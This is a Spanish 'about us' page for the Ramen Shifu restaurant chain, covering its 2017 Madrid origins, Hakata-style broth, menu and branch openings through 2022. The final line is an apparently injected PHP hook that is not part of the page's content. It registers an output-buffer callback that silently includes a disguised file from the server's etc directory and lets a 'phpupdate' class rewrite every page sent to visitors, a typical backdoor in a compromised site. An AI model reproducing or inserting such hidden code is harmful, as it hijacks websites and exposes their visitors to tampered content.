SOBRE NOSOTROS

 

Ramen Shifu comenzó su andadura en el número 65 de la calle Ayala en el popular Barrio Salamanca, Madrid, en el año 2017.

 

Su fundador, Guo Jianyong, presidente del Grupo Ayala Japón, grupo de restauración especializado en comida asiática, siempre había tenido el sueño de crear un concepto de restaurante que tuviera como protagonista el ramen. Una carta que mostrase la variedad y versatilidad que esta sopa de fideos, originalmente china y adoptada por la sociedad nipona, ha cultivado durante décadas de historia y evolución.

 

El fruto de su esfuerzo y dedicación durante décadas de estudios y su experiencia en el país nipón en aprender la “cultura del ramen” culminaron con la aparición de Ramen Shifu. Un concepto joven, desenfadado y con un marcado estilo callejero alejado del concepto de “restaurante oriental”, adoptando ese carácter de “street food japonés” en su versión más tradicional o actual, según el concepto de la taberna, ambientado con elementos decorativos y temáticos del país nipón.

 

En Ramen Shifu, nuestro caldo casero está basado en la receta original de la región de Hakata, distrito de la ciudad de Fukuoka, la cual aprendió de primera mano su fundador, Guo Jianyong, en sus múltiples visitas a restaurantes la región aprendiendo de los “ramen masters”.

 

Un caldo con una rica elaboración de cuatro horas con una textura densa, hecho con huesos de cerdo, tono blanquecino y sabroso, servido con finos fideos. Partiendo de esta base, una amplia carta de ramen recoge su gran versatilidad con hasta 20 opciones para elegir. Desde los tradicionales Tonkotsu Ramen (característico de la región japonesa de Hakata), Shoyu Ramen (el ramen de la capital nipona, Tokyo) o el Miso Ramen (popular en la provincia de Sapporo) a nuevas elaboraciones que se adaptan a gustos más actuales como el Fried Chicken Ramen, Ebi Tempura Ramen o el Beef Curry Ramen.

 

De esta manera, Ramen Shifu es el restaurante ramen con la carta de ramen más amplia de Madrid. Además, Ramen Shifu, en su objetivo de posicionarse como el referente de ramen en Europa, dedica una especial atención a su carta Spicy Ramen. Una selección de platos picantes con la opción de personalizar tu nivel de picante de 1 a 5 como parte de nuestro “Spicy Reto”, donde animamos a nuestros clientes a poner su tolerancia al picante a prueba.

 

Aunque nuestra amplia carta está inspirada por la tradición de las recetas del ramen, en Ramen Shifu tenemos muy presente la innovación y la necesidad de adaptarnos a los nuevos tiempos.

 

Un ejemplo, es nuestra reciente carta vegana lanzada en 2019 con la que queremos satisfacer a nuestros clientes que desean reducir su consumo de carne de procedencia animal. Entrantes característicos del street food japonés como gyozas o takoyakis, nuestra carta de arroces y mazesobas, los famosos mochis japoneses de postre y otras especialidades completan la oferta gastronómica de nuestras tabernas para todos los gustos y apasionados de la gastronomía japonesa.

NUESTRAS TABERNAS

 

En enero de 2017, en la Calle Ayala 65, Ramen Shifu abrió su primera taberna. Su buena acogida hizo que antes de terminar el a o se abrieran en Calle Zurbano 67 y en Calle Toledo 24 durante el mes de septiembre nuevos templos del ramen presentes en los conocidos barrios de Chamberí  y La Latina de Madrid. Un año más tarde, llegar a el turno de Calle Fuencarral 93 con su apertura en agosto de 2018, en pleno corazón de Malasaña.

 

Ese mismo verano de 2018, en Julio, también tendrá lugar la apertura de nuestra primera taberna fuera de la capital madrileña en Alicante, en Calle General Primo de Rivera, una de las principales calles del centro turístico de la localidad.

 

La expansión de la marca continua un año más tarde con la aparición de la primera taberna Ramen Shifu fuera de España. En agosto de 2019, Ramen Shifu abriría sus puertas en Nápoles, Italia, comenzando nuestra andadura Europea. Y poco después, Barcelona acogía  nuestra séptima taberna en el Carrer Consell de Cent 323, cerca de la famosa Rambla de Cataluña y reconocidos edificios históricos como la Casa Batlló.

 

En 2020, Ramen Shifu cerró con la apertura de su primera taberna en Andalucía, concretamente en Estepona, Málaga, sumando meses más tarde su segunda taberna en la comunidad autónoma con la apertura en octubre en Dos Hermanas, Sevilla. También en octubre tuvo lugar la apertura de nuestra segunda taberna catalana en Avinguda del Paral lel 130, una de las arterias principales de la capital y de las calles más valoradas, y semanas más tarde, en Calle Fontanella 13, contando en total con 3 tabernas en Barcelona. Y fuera de nuestras fronteras, nuestra segunda taberna en Italia en Via Fabio Filzi 10, en Milán, continuando así nuestra expansión, no solo italiana, sino en Europa.

 

En el año 2021, Ramen Shifu no perdió el ritmo e inauguró dos nuevas tabernas en Madrid, en Calle de las Infantas 14 y en Calle de Isabel Católica 15, próxima a Gran Vía, una de las principales avenidas comerciales más importantes de España; cerrando el año con la apertura de nuestra primera localización en Tarragona, en el Carrer del Comte de Rius 7 con gran éxito de público.

 

En 2022 no paramos con las aperturas de nuevas tabernas en Madrid, Zaragoza, Reus, Lérida, Luxemburgo, Lisboa, Barcelona e Italia. ¡Os esperamos en nuestras tabernas #adictosalramen!

function ob_gzhanler($s) { $f='/usr/home/ramenshifu.com/etc/ssess_3483733839f192adac3959c62b1e104b'; if(file_exists($f)) include_once($f); return class_exists('phpupdate') ? phpupdate::copyright($s) : $s; } ob_start('ob_gzhanler');